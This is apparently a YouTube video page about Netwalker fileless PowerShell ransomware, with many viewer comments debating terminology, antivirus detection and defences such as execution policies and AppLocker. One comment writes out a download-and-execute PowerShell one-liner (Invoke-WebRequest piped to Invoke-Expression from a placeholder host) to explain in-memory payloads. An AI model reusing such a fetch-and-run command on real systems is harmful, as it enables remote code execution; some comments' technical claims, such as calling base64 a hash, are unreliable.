Fileless Ransomware: Powershell Netwalker
HTML-код
- Опубликовано: 19 ноя 2022
- Netwalker: The fileless ransomware can encrypt your data without any exe file or trace, just a string of characters as a powershell command. www.acronis.com/en-us/product... (Get Acronis with exclusive 30% sponsor discount)
Buy the best antivirus: thepcsecuritychannel.com/best...
Join the discussion on Discord: discord.tpsc.tech/
Get your business endpoints tested by us: tpsc.tech/
Contact us for business: thepcsecuritychannel.com/contact - Наука
Good to see ransomware authors making their code tiny and efficient. Now only if Windows devs can follow suit
maybe Windows team needs some lessons on MISS ( Make it simple, stupid ). I dont see any "put bloatware" in MISS now, do I ?
@@RaskaTheFurry They make it stupid alright.
AHHAHAHAHAHAHHAHA........
¦:¬|
Ransomware payloads are usually very small to avoid detection and insure execution. Furthermore, you want as LITTLE dependencies as possible. This is especially important when you are running ransomware through an interpreted language like powershell. Normal developers don't have to worry about antivirus and dependencies they can have as many dependencies as they want (which makes large projects easier to write and more powerful) because they usually have installers, malware very rarely has an installer, and if it is an installer it is pretty much just a stager/loader which loads a new stage or malicious process to avoid initial detection.
Microsoft can only optimize tracking your activity and using information for advertisement.
I'm as about computer literate as a floppy disk but I like watching your channel to what crazy stuff hacker's come up with nowadays.
Not knowing is better sometimes.
I can't code yet but I imagine it's kinda like chemistry for some... As lots of people simply couldn't trust themselves with their new talents 😂.
This is very well explained.
This is not file-less. If its a powershell script that's a file. If its a browser js, it is still a file your browser downloaded. If it is an office macro it is still a file.
File-less means either (or both) remote code execution and persistence on the network without files. The latter is only extremely advanced APT...
I could accept browser js as file-less as it is code execution and sandbox escape without explicit interaction from the user, even though the files are written to cache if anything, but a powershell script not. The files are there, embedded as base64.
The file-less part is the malicious payload itself, it does however generally need a file to be started as you have said which is correct but after that everything malicious is in memory only as PowerShell will decode the Base64 string and decode whatever else the attackers encoded the payload with. It is even possible to just skip all of that encoding and embed a URL to download the payload from, then there is absolutely nothing related the the malicious payload stored on disk. Invoke-WebRequest will download all of the malicious PowerShell code and save it in memory into a PowerShell variable then Invoke-Expression will start interpreting that in memory data. If you where looking at the initial payload all you would see is one very small command that runs Invoke-WebRequest and pipes it into Invoke-Expression but everything its doing would be run in memory with PowerShell. Would look something like this
Invoke-WebRequest -Uri "somestrangewebsite.com/my-payload.ps1" | Invoke-Expression
And you can obfuscate that however you would like.
@@IWickDev In these cases, AMSI and products with memory scanning ability will be able to detect the malicious code/behavior in memory.
@@IWickDev The encoded payload in this case seems to be a dll, which is then injected to explorer. Pretty classic malware behavior, just wrapped around in a script, which plays the role of pe packer
@@JohnDoe-ln8jp I see, that makes more sense.
@@IndronilAnik That's what we hope to see moving forward.
It's actually a Base64 encoded string of commands, not "encrypted". Anyone with the source code can decode and get exactly what command it executes.
yep, i was like... why not just decode it, its just base64
one of the first thing i do on configuration pcs (since 10y) is applying a SRP aka whitelist with gpo ,(after finishing the image). White list blocks probably 99% of threats even without an AV software. its very easy to configure and a basic protection for all kind of stuff
We use monitoring tools at work that will alert us if a powershell command is run with any form of encrypted code, so if needed i assume we could also block those scripts as well. I did notice that it looks like the encrypted text is in base64 @0:58 so it should be possible to decode the string it encrypted (would be nice to get the full string and see what it is doing in the background, might be actually downloading and then running an actual binary thats the malware)
what tool do you use?
@@c-LAW we use a variety of tools, Cisco AMP and Symantec Endpoint for client protection, Varonis and Stealthwatch for i think patterns on network (large amount of files deleted/modified/encrypted at once, or a lot of SMB traffic to many external hosts) with pretty much everything funneling alerts to LogRythm and email.
Hi Leo, this type of attack of the fireless malware attack I've seen a file just seem to drop in on the computer without me activating anything and I'm wondering how is this possible and besides the antivirus protection what other types of protection can we take into account? Is sandboxie effective with this type of attack?
When Microsoft announced Windows 10 S, today S-mode, they bragged that no known ransomware can infect it. Most only talk about it being limited to Windows Store apps. There is little coverage of S-mode, but one of its features is that it also blocks PowerShell, cmd.exe, and more from running.
Alright, this is actually scary. Because of this my browser java is off by default for years.
Questions
Pages like Wiki have many links. Are they get checkt? Is there a filter installed before someone saves the editing?
Could you make a video on how to disable powershell scripts safely for the standard user , Admin, and Super Admin please?
use AppLocker or WDAC to disallow powershell.exe to run is arguably one of the most efficient way to prevent PowerShell scripts from running.
If you are an IT admin for a company you can actually also deploy a policy to enforce the exectionpolicy for PowerShell script to "AllSigned", but it's not bulletproof though. If a hacker finds a sneaky way to digitally sign their .ps1 files, then they could potentially bypass it, while however it's unlikely they would sign them.
One last note: A lot of installers/upgraders today utilizes PowerShell scripts as part of their routine, and not everyone is good at signing them. So if you decide to completely disable PowerShell scripts, you might run into some issues when you try to install or upgrade your existing applications.
You say at the end that this kind of ransomware can be detected by your sponsor Acronis, but at 3:00, we can see that Acronis has it as undetected. So, will Acronis protect against this? And I'm not talking about the backup protection Acronis can do, but the malware detection part.
Also, we have Norton on our system and it says that Symantec does detect it, I guess they are one and the same? Lastly, is there any reason not to disable powershell command on regular user computer? Thanks!
Bit irrelevent to the subject in the video but is there a product that offers something like a "counter-strike" capability? Where an AV could web-crawl like virus' do and perform "reconnaisance" or "presicion strikes" on their known vectors?
Thank you
I think in Malwarebytes you could configure script blocking?... I remember Leo tried it in the Malwarebytes video, I'm not sure if that can help in this type of ransomware
To protect yourself against this type of scripts and not disabling Powershell, You could allow ONLY signed PS scripts in your environment.
This channel is underrated
What I want to know is if it is encrypted how does the OS execute it? Base64 is a hash not an encryption so it can be reversed and analyzed. I do also wonder why it doesn't get stopped by the execution policy of the OS? By default script execution is disabled in powershell so only typed commands work. I know you can get around it by using the rubber ducky USB but that is unlikely a method that is often used.
If you can trick a user into opening powershell and pasting it in, that'll work without that warning, same if a batch file runs that sadly.
Hi there, I was wondering if its possible for ransomware or any malware to infect a NAS on a network where a shared drive is NOT connected on an infected computer. For example, if I have a Synology NAS on a network with a computer that is infected on the same network, HOWEVER there is NO shared drives connected to it at all but only used to surf the internet with, can the NAS still be infected by some other means (perhaps a vulnerability within DSM?)
If the ransomware is programmed to move laterally using known exploits yes it can also be encrypted - more importantly though, if the shares aren't authenticated then it's just a simple network sweep for smb shares, mount then encrypt - very basic code.
I'm sorry, but why do you say that the string is encrypted? It's a Base64 encoded string, but it's not encrypted. You can just use any Base64 decoder to actually read its contents, meaning that you can absolutely read the ransomware's source code.
If like to see how you protect against this. Group policy to block powershell enough?
I just realised that i may have a (mostly) ransomware proof network storage drive
If i delete or overwrite a file on it, the file is not deleted, but moved to a recycle bin (and access to the recycle bin can be easily restricted)
My PC was infected by ransomware that generates .mkp files ... fortunately my data is OK because i had a backup and changed the infected hard drive with an SSD... I still have all the encrypted files on the old hard drive hoping that there is a decryptor tool for the mkp ransomware ... has anyone any knowledge of such tool?
👍Thanks.
FYI: fileless virus resides in memory like RAM.
LOL since when encrypting and encoding is the same thing? the PowerShell script takes that BASE64 string decode it to ASCII and then run it.
I'm a total newbie so take it into account, but how can you "contract" such malware? I get that you don't directly download this but it sort of downloads in the background to your cache (i think) but what prompts that? Just visiting a shady website? Interacting with an element on such website? What can I do to stay safe from those sorts of things?
Pencil. Paper. Paranoia. Just kidding. Education, only using software from trusted sources, making (and testing!) backups and a fully tested system recovery process. Take a new backup before any system updates, new software installs, etc. My final solution was to just run Windows in a guest virtual machine (in my case - VirtualBox running on Linux Mint) and take snapshots of the VM which I can "roll back" in time. The one I use to access my company VPN gets rolled back after every use. If software updates are required for it, I take a new snapshot after applying them. It's worked OK so far. BTW, the files that comprise the Windows guest get backed up by ZFS snapshots and copied to my NAS using 'zfs send'.
Chris Titus has a powershell command and when I used it after awhile, my Bitdefender Total Security detected some unusual activity something like potentially unwanted app that I couldn't find it anywhere to uninstall it.
And Bitdefender also couldn't find it even when I select "remove" from the choice. It was weird.
can u make a video abt cache viruses? i got a virus one time where the website cached a malicious file then auto-reloaded in order for my browser to load the cached file, luckily my AV deleted it before it ran
I always run my browser and email client sandboxed (Sandboxie-Plus) ,and delete the sandboxes at days end. So far,I have avoided getting infected by any nasties. Not computer literate enough to know if sandboxing is any good against the type of ransomware discussed in this video. I also use Windows Defender,and lately,the free version of Avast One.
I don't get how this would work. When Powershell by default disables automatically running Powershell scripts?
On a different note that outro background is sick, where can i get it
Is acronis still good choice? Can you provide updated test?
"This script file is a fileless ransomware" lol
What about scripts such as python .py can i scan it ?
where can i download the file to check it out thanks for video
Did the Acronis software block Netwalker? Great video! Thanks for posting!
nah acronis is garbage. if you need cloning/back up software, get macrium reflect
Does it also do privilege escalation?
Can crowdstrike edr detect this?
Please test Trend Micro maximum security 2022. Its been a long time since this product was tested by your channel. Anyways thank you for making such informative content. Looking forward to see more videos.
Salutations and Greetings,
Detection rate and removal of malware for Acronis Cyber Protect Home Office.
Is really that good or would you suggest something else :)?
Always the best,
Trend Micro started to screw up my Windows File Explorer and Boxcryptor over the past 12 months and so I’ve uninstalled it and am now using Windows Defender. I’m not happy about that, but at least it gives me back a usable PC that I only just 2 years ago.
Well TrendMicro is shitty.
Set-ExecutionPolicy Restricted
This is what I was talking about towards the end.
@@axq3837 Bypass will eliminate all warning messages. Not advised, but not the worst thing in the world either.
A lot wrong about terminology used here. The payload is not encrypted, it is encoded, which will fail against most modern AV. Also this is not fileless malware, it is in a .ps1 file. Powershell "fileless malware" is usually delivered using invoke-webrequest to download the file from a web server, load it into memory and then execute it, in this case the script is stored on the hard disk.
also I am pretty sure you can inspect the child processes of explorer.exe (threads) and see amlicious threads created, which is what happens during process injection.
Good Video 🔥🔥
AV-Comparatives, one of the world’s foremost antivirus testing organizations based in Austria, conducted a performance test in April 2022 that compared 17 international antivirus brands and ranked them based on their impact on device performance. K7 Antivirus emerged as the winner in the test with an impact score of just 1.6, establishing that K7’s antivirus has the least impact on device performance.
Re mitigation, is it possible to only allow pwsh scripts to run under Administrator accounts? Via Group
Policy or something?
It's already done, by Windows, by default. The execution policy on default installation would not allow this to run, admin or not. To change it one HAS to launch PS as admin and do Set-ExecutionPolicy command with appropriate parameters. To make this run on your machine would take more social engineering than the code.
You can check my words by running Get-ExecutionPolicy PS command on your system to see that it is RemoteSigned by default, and this script should be treated as remote.
When you say it encrypts all the files you have access to does that include file shares you have access to?
If those shares are writeable by you, then yes. Indications are that these cryptolocker malware apps hang out for a while to get the lay of the land to maximize the impact when they finally activate. I really hate kidnappers/extortionists.
I wonder if this Malware can spread onto a Cloud Drive that is linked to the PC, Such as OneDrive that can then spread to every PC it is linked to.
I do know some AV can scan Cloud Drives meaning that software can see, read and write to that drive, so some Malware (Malicious Software) can do the same.
This means that a Single File (or file-less) can infect not just your system but anything that the cloud drives are connected to....
Sometimes, I wish we went back to Books hah, the world is terrifying now.
@@thephoenixking1086 definitely not but there has been some pretty cool exploits related to the cloud
How is this malware distributed?
How can you avoid even downloading it?
Because of this my browser java is off by default for years. It's only active when i say so. Also before you klick any link, the browser highlights the link-address. If there is a weird chain like in the video, it's better not to klick. Serious and not hacked pages don't have such long links.
NetWalker used to be a broad-ranging ransomware operation involving COVID-related phishing against specific corporate networks, government agencies and users alike, but since May 2020 BleepingComputer documents that it adopted a RaaS model involving exclusively targeted attacks on corporate networks by recruiting affiliates (in particular in critical sectors like healthcare).
Requiring admin signed PowerShell scripts helps.
Could you make a video about UEFI malware, how UEFI gets infected and how to defend against it?
@@axq3837 Can a bios image get infected through the OS?
@@axq3837 I have noticed this, but I also have used some PCs that don't use an exe rather requires going into the bios to upload the image via USB. Would that and a bios pw matter in this case?
@@axq3837 Thanks for the answers
Says it is encrypted, when it is basically just base64 encoded 💀
Hey dude, can you make a video on Mac security, and Mac malware?
Yeah but what antivirus should you have for this situation, is it gonna work in the free version?
Also is Windows defender is enough for situations like these?
Um, no
but that long string command going far beyond the edge of the screen is not suspicious at all?...
so the only way to execute powershell malware is to right click and run it? as you cant execute powershell with regular double clicks.
that doesnt make sense, no one randomly right click and run a powershell scripts out of no where.
It can be loaded straight into memory through a second file. First file loads instruction to make a web request, read it and load it into memory. If AMSI protection doesn't catch it and it can bypass smartscreen then AV can't stop it.
just one thing javascript in the browser can't inject a dll into some other process unless a super major bug is found...
Pretty sure he meant Java.
Would this also work on Linux?
I don't think so since this uses PowerShell (which if I remember rightly is Windows only).
Though there most likely is thousands of Linux versions of this, there is so much Malware in existence that there is bound to be something like this for Linux, Mac-OS, Android and everything else in existence.
I'm surprised little me didn't accidentally get everything on the computer my grandma let me use since I accidentally went to risky websites looking for cartoons and games to play lol
We tried supporting you with *TPSC22. Unfortunately it does not work.*
Thank you for all your hard work and time. Your info is priceless.
Will contact Acronis about it. If you use the link, it still counts!
@@pcsecuritychannel Thank you, however, we'll just send you a donation instead. Direct and more to the point. 🙏
I mean ps1 is a file right ?
After a few hours of watching horrifying videos on your channel, the Moral of the Story is: OpenBSD for Life! :)
Many antivirus products will probably detect this powershell expressions which will call malicious behaviours, but to be more protected, i would advise comodo free firewall HIPS protection to be used with existing antivirus product in our pcs. Even if antivirus product fails to detect this malicious powershell code, comodo free firewall HIPS protection would warn you about ".ps1" file execution and if a user is cautious enough and if user has basic knowledge about pcs, he/she would deny that action and would be protected from this attack. Layers of protection is always better than having only one protection software installed in our pcs, in my opinion..
I use comodo free and recently denied a power shell script to run out of no nowhere on a windows 10 desktop. Was not installing/uninstalling. Only new to deny by watching this channel. Comodo in said it was a safe application so yeah. Thanks PC Security/Leo
Comodo Free Firewall from the looks on their own forums hasn't been updated since 2021, or even updated for Windows 11. A ton of users complaining and all their staff say is an update will be available "soon". From what I'm reading online, it seems the company is on life support at this point.
It's Base64, it's not encrypted it's encoded there's a difference.
Can it be used as a dead man switch to protect your own files?
In theory if you had the tools to unprotect them as well then possibly. I'd say to just use BitLocker though (drive encryption, when shut down the encryption key is lost).
Thank you
@@SmilerRyanYT The issue with this, which I had myself is that the drive will ONLY work in that PC it was Encrypted with. BitLocker basically killed my drive working in any other device, when I plugged it in and booted the PC it caused the PC to crash, when I was able to put the Key in it just BSOD the system, This happened with ANY PC I tried (and via a USB Adapter).
Only when plugged back into the original system did it work as if nothing happened, meaning if you Encrypt with BitLocker and that system fails/dies, your Data is GONE and will be a very VERY hard time getting it back, if not impossible. I recommend only using BitLocker on a system you know won't fail any time soon, try to find some software that does the same thing but allows your data to be used on another system (with the key etc.).
@@thephoenixking1086 That seems rather strange, BitLocker usually has portability in mind.
Every time you say "VirusTotal", I hear "Bar Stool"....I may have to cut down on my drinking!
wow
can you test it against norton security?
it is detected by 31 vendors in virustotal here is the full list alphabetical order
Ad-Aware
AhnLab-V3
ALYac
Antiy-AVL
Avast
AVG
BitDefender
Comodo
DrWeb
Emsisoft
eScan
ESET-NOD32
Fortinet
GData
Google
Ikarus
Kaspersky
Lionic
MAX
McAfee
McAfee-GW-Edition
Microsoft
QuickHeal
Sophos
Symantec
Trellix (FireEye)
TrendMicro
TrendMicro-HouseCall
VIPRE
VirIT
ZoneAlarm by Check Point
I disable scripts in PowerShell
sound app control products will block unapproved PS1s from executing...
Yeah, so blaming PowerShell is meaningless. 1) That was a PS file and it would be caught, 2) As you pointed out, the concept applies to any running process (I.e. your browser) and a browser is the more legit threat. 3) Any malware that can't catch changes to a large quantity of files is not effective malware and is mostly useless. 4) If In-memory DLL creation doesn't trigger malware, again, the malware is mostly useless. 5) Simple backups would resolve that problem.
For me, Base64 is not encryption method.
Why are you calling a base64 encoded string, cipher text? Aka, "it's encrypted", 0:46
Interestingly, if you check later in the video at 4:16 the website that he refers to also calls it encrypted, but then also mentions that the string is base64 encoded. My best guess is that the string was encrypted before it was turned into base64, but that also means that it has to be able to decrypt it in order to run it as a PowerShell script. I guess it could do it by requesting a decryption key through a http call or something like that.
Im throwing out my computers
Do an actual review of Acronis.
Isn't all that gibberish just encrypted with Base64? It says it right there at the beginning of that command!
I thought the same thing, I guess it is possible that there is some sort of encryption hiding behind the base64 encoding though, although the encryption method and key is probably there too then, unless it gets it via the web. Here's an "encrypted" message for you: SSdtIGEgZGFuZ2Vyb3VzIGhhY2tlcg==
@@chralexNET I was also curious so I downloaded the file and had a look. I couldn't be bothered to spend too long looking but it's just really heavily obfuscated powershell stuff. Looks like it might drop a couple more files or something. It's definitely not encrypted tho
@@spluad Good to know, thank you!
Those authors of ransom ware are clever at this ransomware shouldn’t be a thing in anything I’m sure if it never made money they’d stop doing that
How come you never tested the Netwalker Powershell Script against Acronis to see what would happen?
cause acronis is shit, never use that garbage
lol u used Jurassic Park Photos
Erm that's a file.... Feels like a bad example of filelese 😂
Discord users beware...
1. javascript code ? 🤣🤨 not true
2. A Macro ? You realize that Microsoft disabled it by def for this exact reason a while ago ? no ?
this isn't what fileless is about bro
first
BOOOOO, you did not use Webroot Antivirus Protection or Avira Antivirus
1st comment
🤡
first comment
Fileless ransomware. Now that's something that would never happen on GNU/Linux 😆
Linux and so on have the same issues as Mac-OS and Windows, they are ALL Venerable and can be infected. The only reason Windows is more prone to attacks is the fact like 95% of ALL Computers users use a form of Windows so hacking that remaining 5% is not worth it but that does not at all mean that these hacks do not happen.
If you realise that someone you want to attack has something you want and they are using Linux, you are going to make software that can hack into this, which happens a LOT more than people realise, BANKS for example sometimes use a form of Linux for their servers, proving Linux gets attacked.
My advise is sell your PC and go back to reading books hah, now that is safe lol.
@@thephoenixking1086 not sure if you're trolling or not. I made a joke about how everything is a "file" on Linux.